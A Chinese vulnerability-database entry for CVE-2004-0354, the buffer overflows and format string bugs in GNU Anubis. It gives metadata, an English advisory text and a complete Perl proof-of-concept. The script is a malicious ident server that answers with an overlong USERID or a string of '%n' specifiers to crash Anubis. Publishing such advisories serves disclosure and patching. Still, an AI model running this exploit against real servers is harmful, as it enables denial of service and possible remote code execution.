GNU Anubis多个远程缓冲区溢出和格式化字符串漏洞

43次阅读
没有评论

GNU Anubis多个远程缓冲区溢出和格式化字符串漏洞

漏洞ID 1107762 漏洞类型 格式化字符串
发布时间 2004-03-01 更新时间 2005-10-20
GNU Anubis多个远程缓冲区溢出和格式化字符串漏洞CVE编号 CVE-2004-0354
GNU Anubis多个远程缓冲区溢出和格式化字符串漏洞CNNVD-ID CNNVD-200411-096
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/23771
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200411-096
|漏洞详情
GNUAnubis3.6.0到3.6.2,3.9.92和3.9.93版本存在多个格式化字符串漏洞。远程攻击者可以借助传递到(1)log.c的info函数,(2)errs.c的anubis_error函数,或者(3)ssl.c的ssl_error函数的字符串说明符执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/9772/info

GNU Anubis has been reported prone to multiple buffer overflow and format string vulnerabilities. It has been conjectured that a remote attacker may potentially exploit these vulnerabilities to have arbitrary code executed in the context of the Anubis software. The buffer overflow vulnerabilities exist in the 'auth_ident' function in 'auth.c'. The format string vulnerabilities are reported to affect the 'info' function in 'log.c', the 'anubis_error' function in 'errs.c' and the 'ssl_error' function in 'ssl.c'.

These vulnerabilities have been reported to exist in GNU Anubis versions 3.6.0, 3.6.1, 3.6.2, 3.9.92, and 3.9.93. It is possible that other versions are affected as well.

These issues are undergiong further analysis, they will be divided into separate BIDs as analysis is completed.

#!/usr/bin/perl --

# anubis-crasher
# Ulf Harnhammar 2004
# I hereby place this program in the Public Domain.

use IO::Socket;


sub usage()
{
  die "usage: $0 typen".
      "type is 'a' (buffer overflow) or 'b' (format string bug).n";
} # sub usage


$port = 113;

usage() unless @ARGV == 1;
$type = shift;
usage() unless $type =~ m|^[ab]$|;

$send{'a'} = 'U' x 400;
$send{'b'} = '%n' x 28;
$sendstr = $send{$type};

$server = IO::Socket::INET->new(Proto => 'tcp',
                                LocalPort => $port,
                                Listen => SOMAXCONN,
                                Reuse => 1) or
          die "can't create server: $!";

while ($client = $server->accept())
{
  $client->autoflush(1);
  print "got a connectionn";

  $input = <$client>;
  $input =~ tr/1512//d;
  print "client said $inputn";

#  $wait = <STDIN>;
#  $wait = 'be quiet, perl -wc';

  $output = "a: USERID: a:$sendstr";
  print $client "$outputn";
  print "I said $outputn";

  close $client;
  print "disconnectedn";
} # while client=server->accept
|参考资料

来源:BID
名称:9772
链接:http://www.securityfocus.com/bid/9772
来源:XF
名称:anubis-format-string(15346)
链接:http://xforce.iss.net/xforce/xfdb/15346
来源:BUGTRAQ
名称:20040304GNUAnubisbufferoverflowsandformatstringbugs
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107843915424588&w;=2
来源:MLIST
名称:[bug-anubis]20040228Importantsecurityupdate
链接:http://mail.gnu.org/archive/html/bug-anubis/2004-02/msg00000.html

相关推荐: Novell Nsure Identity Manager Password Hint Plaintext Storage Weakness

Novell Nsure Identity Manager Password Hint Plaintext Storage Weakness 漏洞ID 1098606 漏洞类型 Design Error 发布时间 2004-04-13 更新时间 2004-04…

正文完
 0